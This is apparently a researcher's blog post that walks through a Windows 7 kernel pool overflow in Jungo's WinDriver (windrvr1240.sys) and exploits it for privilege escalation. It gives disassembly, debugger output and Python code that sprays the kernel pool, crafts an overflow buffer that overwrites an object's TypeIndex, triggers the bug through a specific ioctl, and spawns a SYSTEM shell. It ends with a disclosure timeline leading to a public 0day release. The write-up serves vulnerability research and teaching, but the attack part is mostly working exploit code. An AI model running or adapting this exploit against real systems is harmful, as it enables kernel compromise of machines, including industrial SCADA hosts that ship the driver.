Windows 7 In the past I have spent a lot of time researching web related vulnerabilities and exploitation and whilst I’m relatively versed in usermode exploitation, I needed to get up to speed on windows kernel exploitation. To many times I have tested targets that have kernel device drivers that I have not targeted due to the sheer lack of knowledge. Gaining low privileged code execution is fun, but gaining ring 0 is better!

TL;DR

I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects.

Introduction

After reviewing some online kernel tutorials I really wanted to find and exploit a few kernel vulnerabilities of my own. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn’t work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious.

Recently I have been very slowly (methodically, almost insanely) developing a windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but it’s slight variation allows an attacker to basically exploit any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time.

The vulnerability

After testing a few SCADA products, I came across a third party component called “WinDriver”. After a short investigation I realized this is Jungo’s DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too.

After installation, it installs a device driver named windrvr1240.sys to the standard windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzers config file.

{ 
"ioctls_range":{
"start": "0x95380000",
"end": "0x9538ffff"
}
}

Then, I enabled special pool using verifier /volatile /flags 0x1 /adddriver windrvr1240.sys and run my fuzzer for a little bit. Eventually finding several exploitable vulnerabilities, in particular this one stood out:

kd> .trap 0xffffffffc800f96c
ErrCode = 00000002
eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088
eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207
windrvr1240+0x199e5:
9ffbc9e5 8941fc mov dword ptr [ecx-4],eax ds:0023:8df45000=????????

kd> dd esi+ecx-4
805d2599 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25a9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25b9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25c9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25d9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25e9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d25f9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4
805d2609 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4

That’s user controlled data stored in [esi+ecx] and it’s writing out-of-bounds of a kernel pool. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8.

.text:0041998E sub_41998E      proc near                    ; CODE XREF: sub_419B7C+3B2
.text:0041998E
.text:0041998E arg_0 = dword ptr 8
.text:0041998E arg_4 = dword ptr 0Ch
.text:0041998E
.text:0041998E push ebp
.text:0041998F mov ebp, esp
.text:00419991 push ebx
.text:00419992 mov ebx, [ebp+arg_4]
.text:00419995 push esi
.text:00419996 push edi
.text:00419997 push 458h ; fized size_t +0x8 == 0x460
.text:0041999C xor edi, edi
.text:0041999E push edi ; int
.text:0041999F push ebx ; void *
.text:004199A0 call memset ; memset our buffer before the overflow
.text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer
.text:004199A8 add esp, 0Ch
.text:004199AB mov eax, [edx]
.text:004199AD mov [ebx], eax
.text:004199AF mov eax, [edx+4]
.text:004199B2 mov [ebx+4], eax
.text:004199B5 mov eax, [edx+8]
.text:004199B8 mov [ebx+8], eax
.text:004199BB mov eax, [edx+10h]
.text:004199BE mov [ebx+10h], eax
.text:004199C1 mov eax, [edx+14h]
.text:004199C4 mov [ebx+14h], eax
.text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer
.text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer
.text:004199CD test eax, eax
.text:004199CF jz short loc_4199ED
.text:004199D1 mov esi, edx
.text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write
.text:004199D6 sub esi, ebx
.text:004199D8
.text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D
.text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer
.text:004199DB inc edi ; copy loop index
.text:004199DC mov [ecx], eax ; first dword write
.text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer
.text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer
.text:004199E5 mov [ecx-4], eax ; second dword write
.text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size
.text:004199EB jb short loc_4199D8 ; jump back into loop

The copy loop actually copies 8 bytes for every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + 0x8 byte header). The size of copy is directly attacker controlled from the input buffer (yep you read that right). No integer overflow, no stored in some obscure place, nada. We can see at 0x004199E8 that the size is attacker controlled from the +0x18 offset of the supplied buffer. Too easy!

Exploitation

Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite which has been blogged on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically the tl;dr; is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER.

Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this:

  1. Spray the pool with an object of size X, filling pages of memory.
  2. Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460).
  3. Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex.

For example, say if your overflowed buffer is size 0x200, you could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object that is modulus with our pool size.

The problem is, that doesn’t work with some sizes. For example our pool size is 0x460, so if we do:

>>> 0x460 % 0x40
32
>>> 0x460 % 0x60
64
>>>

We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk, or can we? There are a few ways to solve it. One way was to search for a kernel object that is modulus with our target buffer size. I spent a little time doing this and found two other kernel objects:

# 1
type = "Job"
size = 0x168

windll.kernel32.CreateJobObjectW(None, None)

# 2
type = "Timer"
size = 0xc8

windll.kernel32.CreateWaitableTimerW(None, 0, None)

However, those sizes were no use as they are not modulus with 0x460. After some time testing/playing around, I relized that we can do this:

>>> 0x460 % 0xa0
0
>>>

Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? Well if we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0) then we can achieve it.

The Spray

def we_can_spray():
"""
Spray the Kernel Pool with IoCompletionReserve and Event Objects.
The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
These are allocated from the Nonpaged kernel pool.
"""

handles = []
IO_COMPLETION_OBJECT = 1
for i in range(0, 25000):
handles.append(windll.kernel32.CreateEventA(0,0,0,0))
hHandle = HANDLE(0)
handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))

# could do with some better validation
if len(handles) > 0:
return True
return False

This function sprays 50,000 objects. 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in windbg:

kd> !pool 85d1f000
Pool page 85d1f000 region is Nonpaged pool
*85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected)
Owning component : Unknown (update pooltag.txt)
85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page
85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)

Creating Holes

The ‘IoCo’ tag is representative of a IoCompletionReserve object and a ‘Even’ tag is representative of an Event object. Notice that our first chunks offset is 0x60, thats the offset we will start freeing from. So if we free groups of objects, that is, the IoCompletionReserve and the Event our calculation becomes:

>>> "0x%x" % (0x7 * 0xa0)
'0x460'
>>>

We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve object’s only.

kd> !pool 85d1f000
Pool page 85d1f000 region is Nonpaged pool
*85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected)
Owning component : Unknown (update pooltag.txt)
85d1f060 size: 60 previous size: 60 (Free) IoCo
85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f100 size: 60 previous size: 40 (Free) IoCo
85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f1a0 size: 60 previous size: 40 (Free) IoCo
85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f240 size: 60 previous size: 40 (Free) IoCo
85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f2e0 size: 60 previous size: 40 (Free) IoCo
85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f380 size: 60 previous size: 40 (Free) IoCo
85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f420 size: 60 previous size: 40 (Free) IoCo
85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected)
85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected)
85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)

So we can see we have seperate freed chunks. But we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the offset for our chunks to 0x60 (The first pointing to 0xXXXXY060).

            bin = []

# object sizes
CreateEvent_size = 0x40
IoCompletionReserve_size = 0x60
combined_size = CreateEvent_size + IoCompletionReserve_size

# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object
offset = IoCompletionReserve_size
for i in range(offset, offset + (7 * combined_size), combined_size):
try:
# chunks need to be next to each other for the coalesce to take effect
bin.append(khandlesd[obj + i])
bin.append(khandlesd[obj + i - IoCompletionReserve_size])
except KeyError:
pass

# make sure it's contiguously allocated memory
if len(tuple(bin)) == 14:
holes.append(tuple(bin))

# make the holes to fill
for hole in holes:
for handle in hole:
kernel32.CloseHandle(handle)

Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size.

kd> !pool 8674e000
Pool page 8674e000 region is Nonpaged pool
*8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free
Pooltag Io : general IO allocations, Binary : nt!io
8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected)
8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e560 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e600 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e740 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e880 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e920 size: 40 previous size: 60 (Allocated) Even (Protected)
8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected)
8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected)
8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674eba0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ece0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected)
8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected)
8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected)
8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected)
8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)

We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite.

def we_can_trigger_the_pool_overflow():
"""
This triggers the pool overflow vulnerability using a buffer of size 0x460.
"""

GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
DEVICE_NAME = "\\\\.\\WinDrvr1240"
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
inputbuffer = 0x41414141
inputbuffer_size = 0x5000
outputbuffer_size = 0x5000
outputbuffer = 0x20000000
alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
IoStatusBlock = c_ulong()

if driver_handle:
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,
inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
return True
return False

Surviving the Overflow

You may have noticed the null dword in the exploit at offset 0x90 within the buffer.

def alloc_pool_overflow_buffer(base, input_size):
"""
Craft our special buffer to trigger the overflow.
"""

print "(+) allocating pool overflow input buffer"
baseadd = c_int(base)
size = c_int(input_size)
input = "\x41" * 0x18 # offset to size
input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow)
input += "\x42" * (0x90-len(input)) # padding to survive bsod
input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA
input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer

This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop.

.text:004199ED loc_4199ED:                                  ; CODE XREF: sub_41998E+41
.text:004199ED push 9
.text:004199EF pop ecx
.text:004199F0 lea eax, [ebx+90h] ; controlled from the copy
.text:004199F6 push eax ; void *
.text:004199F7 lea esi, [edx+6Ch] ; controlled offset
.text:004199FA lea eax, [edx+90h] ; controlled offset
.text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy
.text:00419A03 rep movsd
.text:00419A05 push eax ; int
.text:00419A06 call sub_4196CA ; call sub_4196CA

The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call.

.text:004196CA sub_4196CA      proc near                    ; CODE XREF: sub_4195A6+1E
.text:004196CA ; sub_41998E+78 ...
.text:004196CA
.text:004196CA arg_0 = dword ptr 8
.text:004196CA arg_4 = dword ptr 0Ch
.text:004196CA
.text:004196CA push ebp
.text:004196CB mov ebp, esp
.text:004196CD push ebx
.text:004196CE mov ebx, [ebp+arg_4]
.text:004196D1 push edi
.text:004196D2 push 3C8h ; size_t
.text:004196D7 push 0 ; int
.text:004196D9 push ebx ; void *
.text:004196DA call memset
.text:004196DF mov edi, [ebp+arg_0] ; controlled buffer
.text:004196E2 xor edx, edx
.text:004196E4 add esp, 0Ch
.text:004196E7 mov [ebp+arg_4], edx
.text:004196EA mov eax, [edi] ; make sure @eax is null
.text:004196EC mov [ebx], eax ; the write here is fine
.text:004196EE test eax, eax
.text:004196F0 jz loc_4197CB ; take the jump

The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return.

.text:004197CB loc_4197CB:                                  ; CODE XREF: sub_4196CA+26
.text:004197CB pop edi
.text:004197CC pop ebx
.text:004197CD pop ebp
.text:004197CE retn 8

If we don’t do this, we will likley BSOD when attempting to access non-existant pointers from our buffer within this function (we could probably survive this anyway).

Now we can return cleanly and trigger the eop without any issues. For the shellcode cleanup, our overflown buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will just avoid using that pointer.

Crafting Our Buffer

Since the loop copies 0x8 bytes on every iteration and since the starting index is 0x1c:

.text:004199D3                 lea     ecx, [ebx+1Ch]       ; index offset for the first write

We can do our overflow calculation like so. Let’s say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the amount of bytes we want to overflow and divide it all by 0x8 (due to the qword copy per loop iteration).

(0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d

So a size of 0x8d will overflow the buffer by 0x2c or 44 bytes. This smashes the pool header, quota and object header.

    # repair the allocated chunk header...
input += struct.pack("<I", 0x040c008c) # _POOL_HEADER
input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO
input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount)
input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock)
input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex)
input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)

We can see that we set the TypeIndex to 0x00080000 (actually it’s the lower word) to null. This means that that the function table will point to 0x0 and conveniently enough, we can map the null page.

kd> dd nt!ObTypeIndexTable L2
82b7dee0 00000000 bad0b0b0

Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :->

Triggering Code Execution in the Kernel

Well, we survive execution after triggering our overflow, but in order to gain eop we need to set a pointer to 0x00000074 to leverage the OkayToCloseProcedure function pointer.

kd> dt nt!_OBJECT_TYPE name 84fc8040 
+0x008 Name : _UNICODE_STRING "IoCompletionReserve"
kd> dt nt!_OBJECT_TYPE 84fc8040 .
+0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ]
+0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]
+0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ]
+0x008 Name : "IoCompletionReserve"
+0x000 Length : 0x26
+0x002 MaximumLength : 0x28
+0x004 Buffer : 0x88c01090 "IoCompletionReserve"
+0x010 DefaultObject :
+0x014 Index : 0x0 '' <--- TypeIndex is 0x0
+0x018 TotalNumberOfObjects : 0x61a9
+0x01c TotalNumberOfHandles : 0x61a9
+0x020 HighWaterNumberOfObjects : 0x61a9
+0x024 HighWaterNumberOfHandles : 0x61a9
+0x028 TypeInfo : <-- TypeInfo is offset 0x28 from 0x0
+0x000 Length : 0x50
+0x002 ObjectTypeFlags : 0x2 ''
+0x002 CaseInsensitive : 0y0
+0x002 UnnamedObjectsOnly : 0y1
+0x002 UseDefaultObject : 0y0
+0x002 SecurityRequired : 0y0
+0x002 MaintainHandleCount : 0y0
+0x002 MaintainTypeList : 0y0
+0x002 SupportsObjectCallbacks : 0y0
+0x002 CacheAligned : 0y0
+0x004 ObjectTypeCode : 0
+0x008 InvalidAttributes : 0xb0
+0x00c GenericMapping : _GENERIC_MAPPING
+0x01c ValidAccessMask : 0xf0003
+0x020 RetainAccess : 0
+0x024 PoolType : 0 ( NonPagedPool )
+0x028 DefaultPagedPoolCharge : 0
+0x02c DefaultNonPagedPoolCharge : 0x5c
+0x030 DumpProcedure : (null)
+0x034 OpenProcedure : (null)
+0x038 CloseProcedure : (null)
+0x03c DeleteProcedure : (null)
+0x040 ParseProcedure : (null)
+0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0
+0x048 QueryNameProcedure : (null)
+0x04c OkayToCloseProcedure : (null) <--- OkayToCloseProcedure is offset 0x4c from 0x0
+0x078 TypeLock :
+0x000 Locked : 0y0
+0x000 Waiting : 0y0
+0x000 Waking : 0y0
+0x000 MultipleShared : 0y0
+0x000 Shared : 0y0000000000000000000000000000 (0)
+0x000 Value : 0
+0x000 Ptr : (null)
+0x07c Key : 0x6f436f49
+0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ]
+0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]
+0x004 Blink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]

So, 0x28 + 0x4c = 0x74, which is the location of where our pointer needs to be. But how is the OkayToCloseProcedure called? Turns out, that this is a registered aexit handler. So to trigger the execution of code, one just needs to free the corrupted IoCompletionReserve. We don’t know which handle is associated with the overflown chunk, so we just free them all.

def trigger_lpe():
"""
This function frees the IoCompletionReserve objects and this triggers the
registered aexit, which is our controlled pointer to OkayToCloseProcedure.
"""

# free the corrupted chunk to trigger OkayToCloseProcedure
for k, v in khandlesd.iteritems():
kernel32.CloseHandle(v)
os.system("cmd.exe")

Obligatory, full sized screenshot:

Kernel Code Execution

Timeline

  • 2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com.
  • 2017-08-25 – No response from Jungo and two bounced emails.
  • 2017-08-26 – Attempted a follow up with the vendor via website chat.
  • 2017-08-26 – No response via the website chat.
  • 2017-09-03 – Recieved an email from a Jungo representative stating that they are “looking into it”.
  • 2017-09-03 – Requested an timeframe for patch development and warned of possible 0day release.
  • 2017-09-06 – No response from Jungo.
  • 2017-09-06 – Public 0day release of advisory.

Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend) which is relatively slow for an older platform.

Conclusion

Any size chunk that is < 0x1000 can be exploited in this manner. As mentioned, this is not a new technique, but merely a variation to an already existing technique that I wouldn’t have discovered if I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable.

Kernel pool determinimism is strong, simply because if you randomize more of the kernel, then the operating system takes a performance hit. The balance between security and performance has always been problematic and it isn’t always so clear unless you are dealing directly with the kernel.

References

Shoutout’s to beef, sicky, ryujin, skylined and bee13oy for the help! Here, you can find the advisory and the exploit.